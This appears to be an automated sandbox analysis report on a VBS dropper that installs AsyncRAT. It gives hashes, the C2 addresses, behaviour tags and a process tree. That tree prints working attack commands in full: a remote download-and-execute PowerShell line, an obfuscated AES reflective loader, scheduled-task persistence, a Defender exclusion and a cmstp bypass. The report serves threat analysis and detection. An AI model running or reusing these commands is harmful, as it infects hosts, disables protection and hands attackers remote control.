Analysis

  • max time kernel
    599s
  • max time network
    601s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 20:24

General

  • Target

    1821_output.vbs

  • Size

    61KB

  • MD5

    6943e4c37b93c2a81a98a81e36d2d5ce

  • SHA1

    ad2ba17165344f88b6bf0befaac528feb8a3280f

  • SHA256

    57bf3620d73728f07bed5cd48af70ca89dc70721b62c084f5f0feebed7f81a4f

  • SHA512

    78034880a195d5dc7729a6c7631a660f9945dd368a86b50b458e70e0191a7953ba47435c242c94ce8548832e4920e08949fcb1aa099d5d7b927da9bc9b69cf80

  • SSDEEP

    768:ni1+nYY2MDjo2CLlIbkrMvrIzkoILj2AA3drdg8KCklQCdUq13ZZIwX+Ay6Iwcgh:iXvlIkgvrWC3ASCk0q13HX+C9czhG

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:55644

jt8iyre.localto.net:2101

Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    false

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1821_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v2simrfa\v2simrfa.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:228
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB14E.tmp" "c:\Users\Admin\AppData\Local\Temp\v2simrfa\CSC62D8437EE4614EE594F2DC4569703CD3.TMP"
            5⤵
              PID:2712
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\v0ey2cft.inf
            4⤵
              PID:2328
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2340
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:548
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_295_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx295.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:464
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx295.vbs"
              4⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3816
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx295.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1812
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx295.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2228
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2632

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        9751fcb3d8dc82d33d50eebe53abe314

        SHA1

        7a680212700a5d9f3ca67c81e0e243834387c20c

        SHA256

        ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

        SHA512

        54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        5bb6e8e670184ccd8bdd310edb74ac10

        SHA1

        6478d0fdd6928bf57b2c0e1be94828e1f0c635de

        SHA256

        fdab66e81c01b6444dc8b9accee70f76530b6c5eb129bcdab12584f66cbeb0dc

        SHA512

        77d2ce0150824f170fb2fff50930e0854b55c32a614c7427f1cad8ddbe43a7fabd41756224a17d71f78a97abd930c52af701af7f83f03c9decb14728c1ab3b3d

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        292B

        MD5

        4b6ff09c3190aeac8147a5ca5c2088be

        SHA1

        3d1bfaa1306f6a4a28b6500636c85b814c934743

        SHA256

        61b3f5a479171416b2dc583a701e77d94c449693651211a6d466e1ca21759f84

        SHA512

        2359d7113aa0cf844c66eb91808a05b8a9ce6de54f80ee7d7ace131b0d3cbdd811da69d8e63c149c46d00015b996e43b28d7fa965e64a11b56dc2badb74bf698

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        bf0eda50972f08c8b9d8c9cb5ce7d0c2

        SHA1

        2d8fb14d729b8afe30b4dd3d83d9dfa50afd5dab

        SHA256

        58507df56c947895b91930c001aa1e917c7bd33cf813ec203487735195c545e1

        SHA512

        4acafe573b1ef9063ef434e44f72ba3e69d8b39834c13a11fc3c240cacfae71e45634829e31c1669ce842e2f7de0b11a4076142bcd3f185d6db5c67bbd64c2fb

      • C:\Users\Admin\AppData\Local\Temp\RESB14E.tmp

        Filesize

        1KB

        MD5

        72561d8e52fb242210344080d9531fd0

        SHA1

        b3c7ead5f07d83099fb703531d35011cc1994d87

        SHA256

        63d12377445b62873ff68eb0f88d5b98d3c3a49d7d7b1ce344f1492e4046ca7f

        SHA512

        0441d99905691c45b713a2f21e2a69ea800115d69a4e3f8c47569bb0bcb827e6dd1cc60f437f89c769f1e064f3b4083d816164146182989b98b7fb91710c85bc

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fgadmzv4.z3h.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        53KB

        MD5

        5658af2134929280550a46a39d5d1254

        SHA1

        757ce11f87e3886b0320fca0bd6bf1f26968a25e

        SHA256

        942cc99875f60e2aef139a7d8e8341409d2dd4625573f32cbe292124838cdeed

        SHA512

        e7ac74d0f9182d563dcb5765c160bec3ea4ede13a0a2612bafc5c8451393f3646430c340df57f1ad02807d9b610f55da0db2c67d531de21e91c21ebfe3cea1c8

      • C:\Users\Admin\AppData\Local\Temp\v2simrfa\v2simrfa.dll

        Filesize

        4KB

        MD5

        88ac9edb20e8b07d8fff994c239ccdd8

        SHA1

        06f74fb31fbf4a741b9b90144cfa82aec7118d6d

        SHA256

        aee4426b96c3d8b6683d1af4017d763e959765557ea7d8766d57915135315c6b

        SHA512

        f5d75abd3f2b01979f6ca5240b2e039e7e54158105ce74dd543c9db89e533e437cad968e46b485387bc2884c10a1e312b01406c8202b78b1f0bebaf97ad6c159

      • C:\Users\Admin\AppData\Roaming\latencyx295.vbs

        Filesize

        111B

        MD5

        b5e938fa5bec98ee865f5373d4973785

        SHA1

        e5aee2e71f2739a50a1cfaf75fb24e1da2023398

        SHA256

        b977f414701a86813c7c589e6814d7967d8285b85ddcb5ba213a201efd541285

        SHA512

        5a32bd0824dc8833aeabe7b5f766edd4180a75c503139676b9e0de6b13b393cfa67a23e42b8d12453914820036d9e5c14fc3a82c3e4459c34637561e19f7d515

      • C:\windows\temp\v0ey2cft.inf

        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

      • \??\c:\Users\Admin\AppData\Local\Temp\v2simrfa\CSC62D8437EE4614EE594F2DC4569703CD3.TMP

        Filesize

        652B

        MD5

        3cd646975623f8fd0197205294bc8bbf

        SHA1

        a3bc76434c6a3dd0fa12f7409f4c0b58ea907e54

        SHA256

        b975259933e3c9cca1fbabec39e1dbd62e18c194173d86ba3015ecf925575618

        SHA512

        b381774dcbb61a2674b9ea1ba4f8caef535495c75a5dd2b418f694cd584a943bcd792ac00d542f97396279ae349127cd84e420a9ea066094fa95ea5ed1f7d3f2

      • \??\c:\Users\Admin\AppData\Local\Temp\v2simrfa\v2simrfa.0.cs

        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

      • \??\c:\Users\Admin\AppData\Local\Temp\v2simrfa\v2simrfa.cmdline

        Filesize

        369B

        MD5

        ccb9753e6da10495d646543c496e0308

        SHA1

        c8c037ce2a061d2a2675de38a3ecb9456a4d828c

        SHA256

        ebc603133d3f4497daf11a7a9662eb5468521d98036bbec8d96864f9a5a96188

        SHA512

        6e85b4dd775e8cdf5f71feb5e865700bc03bd0bc9f5f7af4509284bf609989bcf6e21959dde01d97375f2d150794907ac3dcbdfd8ddc096c8b6bb13c65cb9401

      • memory/464-98-0x00000000075C0000-0x00000000075DE000-memory.dmp

        Filesize

        120KB

      • memory/464-87-0x00000000075E0000-0x0000000007612000-memory.dmp

        Filesize

        200KB

      • memory/464-102-0x0000000007B60000-0x0000000007B71000-memory.dmp

        Filesize

        68KB

      • memory/464-101-0x0000000007BF0000-0x0000000007C86000-memory.dmp

        Filesize

        600KB

      • memory/464-100-0x00000000079C0000-0x00000000079CA000-memory.dmp

        Filesize

        40KB

      • memory/464-99-0x0000000007830000-0x00000000078D3000-memory.dmp

        Filesize

        652KB

      • memory/464-88-0x00000000706E0000-0x000000007072C000-memory.dmp

        Filesize

        304KB

      • memory/548-57-0x0000000005350000-0x00000000053B6000-memory.dmp

        Filesize

        408KB

      • memory/548-55-0x0000000004A90000-0x0000000004AB2000-memory.dmp

        Filesize

        136KB

      • memory/548-53-0x00000000044D0000-0x0000000004506000-memory.dmp

        Filesize

        216KB

      • memory/548-67-0x0000000005440000-0x0000000005794000-memory.dmp

        Filesize

        3.3MB

      • memory/548-54-0x0000000004B40000-0x0000000005168000-memory.dmp

        Filesize

        6.2MB

      • memory/548-69-0x0000000005A70000-0x0000000005A8E000-memory.dmp

        Filesize

        120KB

      • memory/548-70-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

        Filesize

        304KB

      • memory/548-71-0x00000000072B0000-0x000000000792A000-memory.dmp

        Filesize

        6.5MB

      • memory/548-72-0x0000000006040000-0x000000000605A000-memory.dmp

        Filesize

        104KB

      • memory/548-73-0x0000000006070000-0x0000000006078000-memory.dmp

        Filesize

        32KB

      • memory/548-74-0x0000000006D10000-0x0000000006DAC000-memory.dmp

        Filesize

        624KB

      • memory/548-75-0x0000000006E30000-0x0000000006E3E000-memory.dmp

        Filesize

        56KB

      • memory/548-76-0x0000000007EE0000-0x0000000008484000-memory.dmp

        Filesize

        5.6MB

      • memory/548-56-0x0000000005270000-0x00000000052D6000-memory.dmp

        Filesize

        408KB

      • memory/968-123-0x0000000006260000-0x0000000006272000-memory.dmp

        Filesize

        72KB

      • memory/968-128-0x00000000088A0000-0x0000000008932000-memory.dmp

        Filesize

        584KB

      • memory/968-127-0x0000000007FA0000-0x0000000007FBE000-memory.dmp

        Filesize

        120KB

      • memory/968-126-0x0000000007C80000-0x0000000007CE8000-memory.dmp

        Filesize

        416KB

      • memory/968-125-0x0000000007F20000-0x0000000007F96000-memory.dmp

        Filesize

        472KB

      • memory/1692-26-0x000002812D190000-0x000002812D198000-memory.dmp

        Filesize

        32KB

      • memory/1692-12-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1692-11-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1692-10-0x000002812D1C0000-0x000002812D1E2000-memory.dmp

        Filesize

        136KB

      • memory/1692-43-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

        Filesize

        8KB

      • memory/1692-48-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1692-13-0x000002812D530000-0x000002812D54C000-memory.dmp

        Filesize

        112KB

      • memory/1692-44-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

      • memory/1692-0-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

        Filesize

        8KB